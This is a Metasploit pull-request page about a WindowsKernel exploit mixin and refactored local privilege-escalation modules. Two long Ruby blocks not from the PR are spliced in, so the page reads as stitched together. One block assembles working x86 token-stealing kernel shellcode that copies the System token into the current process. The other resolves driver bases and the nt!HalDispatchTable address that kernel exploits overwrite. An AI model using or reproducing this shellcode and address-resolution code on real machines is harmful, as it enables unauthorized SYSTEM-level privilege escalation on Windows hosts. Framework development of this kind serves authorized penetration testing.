
WindowsKernel Exploit Mixin And Module Refactoring #3612

Merged
merged 11 commits into from Aug 10, 2014

Conversation

zeroSteiner
Contributor

This PR adds a new WindowsKernel exploit mixin which offers convenient functions and reduces the amount of copy-and-paste code between the current modules. The functions provided are helpful for exploits which need to determine the address of nt!HalDispatchTable, create token stealing shellcode, and other general tasks. Out of the 5 exploits which seem to be copy-and-paste descendants from each other, the following 3 have been reworked to use the mixin:

  • windows/local/ms11_080_afdjoinleaf
  • windows/local/mqac_write
  • windows/local/ms_ndproxy

The following two modules I left unchanged because I could not obtain access to the software for testing:

  • windows/local/novell_client_nicm
  • windows/local/novell_client_nwfs

Verification steps:

  • Test the new ms11_080_afdjoinleaf exploit module
  • Test the new mqac_write exploit module
  • Test the new ms_ndproxy exploit module
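The "create token stealing shellcode" helper mentioned above is the usual place where per-target structure offsets get baked into hand-assembled x86. The block below is an added example, not the mixin's or the PR's code: it assembles the classic token-stealing payload from an offsets table so the same routine serves several targets. The `WIN7_X86_OFFSETS` values are assumed to be the Windows 7 x86 layout of nt!_KTHREAD and nt!_EPROCESS; other releases need their own table, and `loop_target_offset` is a hypothetical self-check that decodes the backward jump without a kernel.

```ruby
# Added example, not code from the PR or the Metasploit mixin: assemble x86
# token-stealing kernel shellcode from per-target structure offsets.
# The offsets are ASSUMED to be those of Windows 7 x86; other releases lay
# out _KTHREAD/_EPROCESS differently and need their own table.
WIN7_X86_OFFSETS = {
  kthread_process: 0x50, # nt!_KTHREAD.ApcState.Process (current _EPROCESS)
  eprocess_pid:    0xb4, # nt!_EPROCESS.UniqueProcessId
  eprocess_links:  0xb8, # nt!_EPROCESS.ActiveProcessLinks (LIST_ENTRY)
  eprocess_token:  0xf8  # nt!_EPROCESS.Token (EX_FAST_REF)
}.freeze

SYSTEM_PID = 4 # PID of the System process, whose token the shellcode copies

# 32-bit little-endian immediate / displacement as a byte array.
def le32(v)
  [v].pack('V').bytes
end

# Returns the shellcode as a binary String. Every memory operand is encoded
# with a disp32, so any offset fits and instruction sizes never change:
# the prologue is always 19 bytes, the loop body 17, the jnz at byte 36.
def token_stealing_shellcode(offsets = WIN7_X86_OFFSETS, system_pid = SYSTEM_PID)
  prologue = []
  prologue += [0x64, 0xA1] + le32(0x124)                     # mov eax, fs:[0x124]  ; KPCR.PrcbData.CurrentThread
  prologue += [0x8B, 0x80] + le32(offsets[:kthread_process]) # mov eax, [eax+0x50]  ; current _EPROCESS
  prologue += [0x89, 0xC1]                                   # mov ecx, eax         ; ecx = our _EPROCESS
  prologue += [0xBA] + le32(system_pid)                      # mov edx, 4           ; PID to look for

  # Walk ActiveProcessLinks until UniqueProcessId == edx.
  body = []
  body += [0x8B, 0x80] + le32(offsets[:eprocess_links])      # mov eax, [eax+0xb8]  ; Flink
  body += [0x2D] + le32(offsets[:eprocess_links])            # sub eax, 0xb8        ; LIST_ENTRY -> _EPROCESS
  body += [0x39, 0x90] + le32(offsets[:eprocess_pid])        # cmp [eax+0xb4], edx
  jnz = [0x75, -(body.size + 2) & 0xFF]                      # jnz <body start>     ; rel8 back over body + jnz

  epilogue = []
  epilogue += [0x8B, 0x90] + le32(offsets[:eprocess_token])  # mov edx, [eax+0xf8]  ; System token
  epilogue += [0x89, 0x91] + le32(offsets[:eprocess_token])  # mov [ecx+0xf8], edx  ; overwrite our token
  epilogue += [0xC3]                                         # ret

  (prologue + body + jnz + epilogue).pack('C*')
end

# Hypothetical self-check: decode the rel8 of the jnz (fixed at byte 36, see
# above) and return the absolute offset it jumps to. Should equal 19, the
# first byte of the loop body.
def loop_target_offset(sc, jnz_at = 36)
  rel = [sc.getbyte(jnz_at + 1)].pack('C').unpack1('c')
  jnz_at + 2 + rel
end

if __FILE__ == $PROGRAM_NAME
  sc = token_stealing_shellcode
  puts "#{sc.bytesize} bytes, loop target byte #{loop_target_offset(sc)}"
  puts sc.unpack1('H*')
end
```

The shellcode returns to the caller rather than cleaning up the kernel stack; how control gets there (for instance through an overwritten nt!HalDispatchTable entry reached via NtQueryIntervalProfile) and what must be restored afterwards is the per-exploit part the mixin leaves to each module.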

@kernelsmith
Contributor

Nice!

On Aug 4, 2014, at 14:35, Spencer McIntyre notifications@github.com wrote:

You can merge this Pull Request by running

   git pull https://github.com/zeroSteiner/metasploit-framework windows-kernel

Or view, comment on, or merge it at: #3612

Commit Summary

  • Create a basic WindowsKernel exploit mixin
  • Cleanup the WindowsKernel mixin
  • Add an open_device function for wrapping CreateFileA
  • Fix guessing the arch with modules specifying an array
  • Support writing a copy of the original token
  • Refactor MS11-080 to use the mixin and for style
  • Switch ms_ndproxy to use the new WindowsKernel mixin
  • Apply rubocop suggestions for ms_ndproxy
  • Update mqac_write to use the mixin and restore pointers

File Changes

  • A lib/msf/core/exploit/local/windows_kernel.rb (160)
  • M modules/exploits/windows/local/mqac_write.rb (103)
  • M modules/exploits/windows/local/ms11_080_afdjoinleaf.rb (213)
  • M modules/exploits/windows/local/ms_ndproxy.rb (307)

Patch Links:

  • https://github.com/rapid7/metasploit-framework/pull/3612.patch
  • https://github.com/rapid7/metasploit-framework/pull/3612.diff


   # @return [nil] If the name specified could not be found.
   #
   def find_sys_base(drvname)
     unless session.railgun.dlls.keys.include?('psapi')
Contributor

Why not just define the dll/function in rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb? :)

@zeroSteiner
Contributor Author

Thanks for all the feedback @Meatballs1, I've implemented everything you pointed out except for putting the shellcode in external/data. Since psapi has its definitions added to railgun now, I did remove the addition of the functions in the two novell exploits.

   # @return [nil] If the name specified could not be found.
   #
   def find_sys_base(drvname)
     if sysinfo['Architecture'] =~ /(x86|wow64)/i
Contributor
I think railgun.util exposes pointer_size which is a bit neater

   def pointer_size
     is_64bit ? 8 : 4
   end
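The two review threads above touch the same routine: find_sys_base walks the driver list psapi returns, and the element width of that list is exactly what railgun.util.pointer_size decides. The block below is an added example, not the mixin's or Metasploit's code: it shows the decoding of an EnumDeviceDrivers-style buffer with the session pointer size, the case-insensitive name match that yields nil when the driver is not loaded (the documented `@return [nil]` case), and the rebasing arithmetic that turns a user-mode nt!HalDispatchTable address into the kernel one. The railgun calls are replaced by a `name_of` callback and constructed sample data; every address and driver name in `SAMPLE_*` is made up so the code runs offline.

```ruby
# Added example, not code from the PR or from Metasploit: the logic behind a
# psapi-based find_sys_base plus the nt!HalDispatchTable rebasing, with the
# railgun calls replaced by constructed sample data. In a live session the
# buffer would come from psapi!EnumDeviceDrivers and the names from
# psapi!GetDeviceDriverBaseNameA; all addresses below are made up.

# EnumDeviceDrivers fills lpImageBase with an array of native pointers and
# reports the byte count actually written in lpcbNeeded. Decode only that
# prefix, with the element width taken from the session's pointer size
# (what railgun.util.pointer_size returns: 8 on x64, 4 on x86/wow64).
def parse_driver_bases(buf, needed, pointer_size)
  raise ArgumentError, "unsupported pointer size #{pointer_size}" unless [4, 8].include?(pointer_size)
  raise ArgumentError, 'needed is not a whole number of pointers' unless (needed % pointer_size).zero?
  buf.byteslice(0, needed).unpack(pointer_size == 8 ? 'Q<*' : 'V*')
end

# Base address of the loaded driver whose base name matches drvname
# (case-insensitive), or nil if no such driver is loaded. name_of stands in
# for GetDeviceDriverBaseNameA and may return nil for a base it cannot name.
def find_sys_base(drvname, bases, name_of)
  bases.find { |base| (name = name_of.call(base)) && name.casecmp?(drvname) }
end

# nt!HalDispatchTable is exported by ntoskrnl.exe. Its RVA is identical in a
# user-mode mapping of the same file (LoadLibrary + GetProcAddress) and in
# the running kernel, so rebase the user-mode address onto the kernel base.
def hal_dispatch_table_address(kernel_base, user_base, user_hal_addr)
  raise ArgumentError, 'export address below its image base' if user_hal_addr < user_base
  kernel_base + (user_hal_addr - user_base)
end

# --- constructed sample data (not real addresses) ---------------------------
SAMPLE_X86_BASES = [0x82a04000, 0x8ba12000, 0x8bc7b000].freeze
# Buffer as the API would leave it: three pointers, then stale bytes beyond
# lpcbNeeded that must be ignored.
SAMPLE_X86_BUF = (SAMPLE_X86_BASES.pack('V*') + ("\xAA".b * 8)).freeze
SAMPLE_X86_NEEDED = SAMPLE_X86_BASES.size * 4
SAMPLE_NAMES = {
  0x82a04000 => 'ntoskrnl.exe',
  0x8ba12000 => 'hal.dll',
  0x8bc7b000 => 'afd.sys'
}.freeze
# Pretend user-mode mapping of ntoskrnl.exe and where GetProcAddress reports
# HalDispatchTable inside it (made-up values).
SAMPLE_USER_BASE = 0x10000000
SAMPLE_USER_HAL  = 0x1013c5e8

# End to end: locate the kernel base of ntoskrnl.exe and rebase the export.
# Returns nil when ntoskrnl.exe is absent from the list, mirroring find_sys_base.
def sample_hal_dispatch_table
  bases = parse_driver_bases(SAMPLE_X86_BUF, SAMPLE_X86_NEEDED, 4)
  nt_base = find_sys_base('NTOSKRNL.EXE', bases, ->(b) { SAMPLE_NAMES[b] })
  return nil if nt_base.nil?
  hal_dispatch_table_address(nt_base, SAMPLE_USER_BASE, SAMPLE_USER_HAL)
end

puts format('nt!HalDispatchTable = 0x%08x', sample_hal_dispatch_table) if __FILE__ == $PROGRAM_NAME
```

Two details carry over to a real session: EnumDeviceDrivers has to be called once to learn lpcbNeeded and again with a buffer of that size, and on x64 the kernel base name may still be ntoskrnl.exe while the on-disk file loaded in user mode must be the same image version, otherwise the RVA does not line up.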

@Meatballs1
Contributor

Will see if I can get a couple of environments spun up at the weekend to test.

@Meatballs1 Meatballs1 merged commit 2ed02c3 into rapid7:master Aug 10, 2014
@zeroSteiner zeroSteiner deleted the windows-kernel branch February 23, 2021 18:07